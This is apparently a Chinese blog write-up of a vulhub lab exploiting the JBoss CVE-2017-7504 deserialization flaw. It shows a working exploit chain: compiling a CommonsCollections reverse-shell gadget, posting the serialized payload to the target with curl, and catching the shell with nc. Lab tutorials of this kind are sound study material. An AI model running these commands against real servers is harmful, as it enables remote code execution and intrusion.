vulhub之jboss(CVE-2017-7504)

复制代码
JBoss AS 4.x 及之前版本中, JbossMQ 实现过程的 JMS over HTTP Invocation Layer 的 HTTPServerILServlet.java 文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。
CVE-2017-7504 漏洞与 CVE-2015-7501 的漏洞原理相似,只是利用的路径不一样, CVE-2017-7504 出现在 /jbossmq-httpil/HTTPServerILServlet 路径下。

JBoss AS 4.x及之前版本中,JbossMQ实现过程的 JMS over HTTP Invocation Layer 的HTTPServerILServlet.java ⽂件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利⽤该漏洞执⾏任意代码。

环境准备

问题:

端口占用

如果默认的8080端口被占用,可以改为:docker run -p 8080:8081 <image_name>

或者修改docker-compose 端口号

漏洞发现

访问your-ip:8080/jbossmq-httpil/HTTPServerILServlet

如出现以下界面,说明存在此漏洞

漏洞利用

进入攻击机,下载反序列化工具

下载地址:GitHub - ianxtianxt/CVE-2015-7501: (CVE-2015-7501)JBoss JMXInvokerServlet 反序列化漏洞

进入目录执行

1、javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java

2、java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap ip:监听端口

再用之前生成的.ser文件,通过POST二进制数据上去,使用nc监听端口,即可拿到shell

curl http://目标ip:port/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser

相关推荐
序属秋秋秋17 分钟前
《Linux系统编程之进程环境》【环境变量】
linux·运维·服务器·c语言·c++·操作系统·系统编程
雲烟18 分钟前
嵌入式设备EMC安规检测参考
网络·单片机·嵌入式硬件
Token_w30 分钟前
openGauss:全密态数据库的金融级安全实践
数据库·安全·金融
Yue丶越34 分钟前
【C语言】数据在内存中的存储
c语言·开发语言·网络
Altair12311 小时前
nginx的https的搭建
运维·网络·nginx·云计算
李宥小哥1 小时前
Redis10-原理-网络模型
开发语言·网络·php
云计算练习生1 小时前
linux shell编程实战 10 Git工具详解与运维场景实战
linux·运维·git
Umi·1 小时前
iptables的源地址伪装
运维·服务器·网络
在路上看风景1 小时前
6.4 LANS
网络
阿巴~阿巴~3 小时前
自定义协议设计与实践:从协议必要性到JSON流式处理
服务器·网络·网络协议·json·操作系统·自定义协议